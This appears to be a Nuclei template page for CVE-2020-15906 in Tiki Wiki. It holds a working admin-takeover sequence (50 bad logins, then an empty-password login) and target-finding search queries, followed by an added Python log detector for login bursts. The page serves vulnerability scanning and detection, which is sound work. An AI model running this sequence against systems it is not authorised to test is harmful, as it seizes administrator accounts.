Tiki Wiki CMS GroupWare - Authentication Bypass
ID: CVE-2020-15906
Severity: critical
Author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
Tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass
Description
tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
YAML Source
id: CVE-2020-15906

info:
  name: Tiki Wiki CMS GroupWare - Authentication Bypass
  author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
  severity: critical
  description: |
    tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
  reference:
    - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15906
    - https://github.com/Z0fhack/Goby_POC
    - https://github.com/bakery312/Vulhub-Reproduce
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15906
    cwe-id: CWE-307
    epss-score: 0.02136
    epss-percentile: 0.88924
    cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
  metadata:
    vendor: tiki
    product: tiki
    shodan-query: title:"Tiki Wiki CMS"
    fofa-query: title="Tiki Wiki CMS"
    google-query: intitle:"Tiki Wiki CMS
  tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass

http:
  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: ticket1
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  - raw:
      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login_scr.php

        ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    payloads:
      attempt:
        - nkQ0yYzgF5Er
        - P5UdGflH48W3
        - xFq7vKNLmhZp
        - 8zKtGnh4dW5R
        - CfXp2VbQz8Er
        - Lh3K6vPzM9Xn
        - bG4RxHpY2MdQ
        - 7zNtKh3WqF5L
        - Y8rQ2GpLx9Kn
        - C7KzLmP5X9Vh
        - v3LdX8GmQ5Kn
        - W4NzX6PqL3Ft
        - Q5GhY2VrX7Jk
        - r9KdL4PhY6Gm
        - 8XjVq5LhZ2Kr
        - L5WnQ9KzY8Pr
        - M2XdL5GrY9Kh
        - N6YzP8WkL5Xt
        - G7JqX5VbM2Kp
        - H4PrX8LkY6Gm
        - J5LhY2VqX9Kr
        - 8GrX5NqL2KhY
        - K4WnY9PzM8Xt
        - Q2XkL5PrY8Vh
        - 9JhL4VqX5GrM
        - N2XdY5PqL9Kh
        - W4LhY8KzM5Xt
        - G5JqX2VrY9Kp
        - H9PrL5XkY2Gm
        - L8WnX5KzY9Pr
        - M4XkY2LqV5Gt
        - N5XdL9PqY8Kr
        - P8XnL5VrY2Kh
        - Q4JqX9LhY5Gr
        - V7LkX5PrY2Gt
        - L2WnY9KzX8Pr
        - M9XdL5PqY4Kh
        - N8LhY2VqX5Gr
        - Q7XkL5PrY9Gm
        - X4LhY8WnM5Kp
        - G2JqL5VrY9Kt
        - H7PrX8KzY2Gm
        - J4LhY5VqX9Kr
        - N9XkY2LqP5Gt
        - W8LhY5PrX2Kz
        - G4JqL5XkY9Vr
        - P5WnY2KzL8Gt
        - M7XkY9LhP2Gr
        - Q2JqL5VrY8Kh
        - 2JqL5VrY8Kh
    attack: batteringram
    threads: 50

  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login.php

        ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    extractors:
      - type: regex
        part: body_1
        name: ticket2
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  - raw:
      - |
        GET /tiki-index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "System Menu"
          - "Home"
          - "Search"
          - "Wiki"
          - "File Galleries"
          - "Settings"
        condition: and

      - type: word
        words:
          - "Show on admin log-in"
          - "Tiki Setup"
        condition: and
# digest: 4b0a00483046022100a4a60ab70fdcd49dcec8faeb55652b99c4a2025988af3ebc213d9fcac0bdc98b022100d6f7b0a7bf3f39f2b78ba8adb120fd8d6568b8c5dfa4d2062c60d848e884eb84:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template checks whether a Tiki instance is affected by the behaviour described above: it sends 50 invalid admin logins, then attempts a login with an empty password and looks for an authenticated admin page. Run it with the Nuclei tool against a target URL:
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-15906.yaml"
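From the defender's side, the precondition for this bypass (CWE-307, improper restriction of excessive authentication attempts) is visible in ordinary web server access logs as a burst of POSTs to /tiki-login.php from one source. The following is an added detection example, not part of the template or of Tiki itself; it assumes Apache/nginx "combined" log format, and the log lines, IP addresses, the 60-second window and the helper names (parse_line, find_login_bursts, build_sample_log) are constructed for this illustration. The threshold of 50 is the count stated in the CVE description; the remediation the page supports is upgrading to Tiki 21.2 or later.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Matches the start of an Apache/nginx "combined" access-log line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop any query string
        "status": int(m.group("status")),
    }


def find_login_bursts(lines, threshold=50, window_seconds=60, path="/tiki-login.php"):
    """Flag each source IP that sent `threshold` POSTs to `path` within `window_seconds`.

    A per-IP sliding window of timestamps is kept; an IP is reported once, as
    (ip, first_ts_in_window, ts_of_threshold_hit). 50 attempts is the count after
    which vulnerable Tiki (< 21.2) blanks the admin password, so reaching it is the
    event worth alerting on, independent of whether the attempts succeeded.
    """
    windows = defaultdict(deque)
    alerted = set()
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        q = windows[rec["ip"]]
        q.append(rec["ts"])
        # Evict timestamps older than the window relative to the newest request.
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and rec["ip"] not in alerted:
            alerted.add(rec["ip"])
            hits.append((rec["ip"], q[0], rec["ts"]))
    return hits


def build_sample_log():
    """Constructed sample: one source sends 50 login POSTs in 25 s, another sends 3."""
    base = datetime(2020, 10, 20, 12, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(50):
        ts = (base + timedelta(seconds=i // 2)).strftime(TS_FMT)
        lines.append(f'203.0.113.7 - - [{ts}] "POST /tiki-login.php HTTP/1.1" 302 0')
    for i in range(3):
        ts = (base + timedelta(seconds=i * 10)).strftime(TS_FMT)
        lines.append(f'198.51.100.4 - - [{ts}] "POST /tiki-login.php HTTP/1.1" 302 0')
    ts = (base + timedelta(seconds=40)).strftime(TS_FMT)
    lines.append(f'198.51.100.4 - - [{ts}] "GET /tiki-index.php HTTP/1.1" 200 5120')
    return lines


if __name__ == "__main__":
    for ip, first, last in find_login_bursts(build_sample_log()):
        print(f"ALERT: {ip} reached 50 login POSTs between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

The window is deliberately short: in a real deployment the same rule would run over the live log tail (or in a SIEM query keyed on client IP and path), and any hit on an instance older than 21.2 should be treated as a likely admin account compromise, since the lockout logic itself is what removes the password.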